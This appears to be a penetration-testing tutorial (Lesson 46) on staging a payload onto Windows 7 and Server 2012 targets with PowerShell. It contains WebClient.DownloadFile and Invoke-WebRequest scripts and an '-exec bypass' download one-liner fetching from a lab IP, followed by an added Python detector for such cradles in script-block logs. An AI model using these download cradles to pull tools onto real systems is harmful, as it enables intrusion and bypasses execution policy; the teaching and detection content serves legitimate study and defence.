# Lesson 46: Downloading a payload with a PowerShell one-liner

PowerShell has been built into Windows since Windows 7: Windows 7 ships with PowerShell 2.0 and Windows 8 with PowerShell 3.0.

**Target machine: Windows 7** (`powershell $PSVersionTable`)\
![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJws29lRjQ8mCK-EKF%2F07fa8437a844c082c950d5643c994ef1.jpg?generation=1551060434619958\&alt=media)

## down.ps1:

Based on System.Net.WebClient\
![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJws2BeDL-vi0eK2Uy%2Fc539c15cfe12c5ae4c5846e6b5a485b3.jpg?generation=1551060431344587\&alt=media)

![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJws2D0sDdfUgLDRcP%2F8772baf3212d72078525abfa44923db1.jpg?generation=1551060448862323\&alt=media)

## Appendix:

```powershell
$Urls = @()
$Urls += "http://192.168.1.115/robots.txt"
$OutPath = "E:\PDF\"
ForEach ($item in $Urls) {
    # Use the last path segment of the URL as the local file name
    $file = $OutPath + ($item).split('/')[-1]
    (New-Object System.Net.WebClient).DownloadFile($item, $file)
}
```

**Target machine: Windows Server 2012** (`powershell $PSVersionTable`)\
![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJws2F57MTVEmLMB0z%2Feaa0bd3c317ef0ae922676a353c59f15.jpg?generation=1551060442332445\&alt=media)

## down.ps1:

From PowerShell 3.0 onwards, a wget-like capability is provided, namely Invoke-WebRequest\
![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJws2HVXHzfWEADw32%2F218c38bbb622f9c8a2634cc1c1a713c3.jpg?generation=1551060445932526\&alt=media)

`C:\inetpub>powershell C:\inetpub\down.ps1`\
Note: an absolute path to the script is required.

![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJws2JmQXDlm9AO8d8%2Fe6557dac203ad4ac9cc208f135f56307.jpg?generation=1551060433998329\&alt=media)

![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJws2LWFihFZnuFjHu%2F69ef693d770cee3f0a5bd9dfdee62f0a.jpg?generation=1551060424928813\&alt=media)

## Appendix:

```powershell
$url = "http://192.168.1.115/robots.txt"
$output = "C:\inetpub\robots.txt"
$start_time = Get-Date
Invoke-WebRequest -Uri $url -OutFile $output
# Report the elapsed wall-clock time of the download
Write-Output "Time : $((Get-Date).Subtract($start_time).Seconds) second(s)"
```

**Of course, the download can also be done with a single command line:**

```powershell
powershell -exec bypass -c (new-object System.Net.WebClient).DownloadFile('http://192.168.1.115/robots.txt','E:\robots.txt')
```

![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJws2N_g2taTkxpf4J%2Fd40cd11aaad0632c0941441a31e3286f.jpg?generation=1551060446743083\&alt=media)
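As the defender's counterpart to the cradles above, here is an added detection example in Python (not part of the original lesson): it scans PowerShell script-block log text, as Script Block Logging records it, for the WebClient.DownloadFile and Invoke-WebRequest -OutFile patterns and separates those fetch-to-disk primitives from flags such as `-exec bypass` that are only context. The sample script blocks are constructed for the demonstration.

```python
"""Flag PowerShell download cradles of the kinds shown on this page in text
recorded by Script Block Logging (Event ID 4104): WebClient.DownloadFile,
Invoke-WebRequest -OutFile, and -exec bypass / -c on the command line."""
import re

CRADLE_PATTERNS = {  # matched case-insensitively, as PowerShell itself is
    # (New-Object System.Net.WebClient).DownloadFile(url, path)
    "webclient_downloadfile": re.compile(
        r"new-object\s+(?:system\.)?net\.webclient\b.*?\.downloadfile\s*\(", re.I | re.S),
    # Invoke-WebRequest (or its aliases iwr/wget/curl) writing to disk
    "invoke_webrequest_outfile": re.compile(
        r"\b(?:invoke-webrequest|iwr|wget|curl)\b.*?-outfile\b", re.I | re.S),
    # -ExecutionPolicy Bypass, including prefix abbreviations such as -exec
    "executionpolicy_bypass": re.compile(r"-(?:ex\w*|ep)\s+bypass\b", re.I),
    # -Command / -c: the whole cradle passed inline on the command line
    "inline_command": re.compile(r"(?:^|\s)-c(?:ommand)?\b", re.I),
}
URL_PATTERN = re.compile(r"https?://[^\s'\"()]+", re.I)
FETCH_INDICATORS = {"webclient_downloadfile", "invoke_webrequest_outfile"}

# Constructed sample script blocks for demonstration; not real telemetry.
SAMPLE_SCRIPT_BLOCKS = [
    "powershell -exec bypass -c (new-object System.Net.WebClient)"
    ".DownloadFile('http://192.168.1.115/robots.txt','E:\\robots.txt')",
    "$url = 'http://192.168.1.115/robots.txt'\n"
    "Invoke-WebRequest -Uri $url -OutFile C:\\inetpub\\robots.txt",
    "Get-ChildItem C:\\inetpub -Recurse | Measure-Object -Property Length -Sum",
    "powershell -ep bypass -File C:\\scripts\\maintenance.ps1",
]


def analyse_script_block(text):
    """Return verdict, fired indicators and any URLs found in one script block."""
    hits = [name for name, rx in CRADLE_PATTERNS.items() if rx.search(text)]
    if FETCH_INDICATORS & set(hits):
        verdict = "download_cradle"   # a fetch-to-disk primitive is present
    elif hits:
        verdict = "suspicious_flags"  # policy/command flags alone: context only
    else:
        verdict = "benign"
    return {"verdict": verdict, "indicators": hits, "urls": URL_PATTERN.findall(text)}


def scan(blocks):
    """Keep only the blocks worth an analyst's attention, URLs extracted."""
    results = ((b, analyse_script_block(b)) for b in blocks)
    return [{"block": b, **r} for b, r in results if r["verdict"] != "benign"]
```

The extracted URLs give the triage pivot: the same host seen across several flagged blocks is the first thing to block and to check in proxy logs.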

> Micropoor
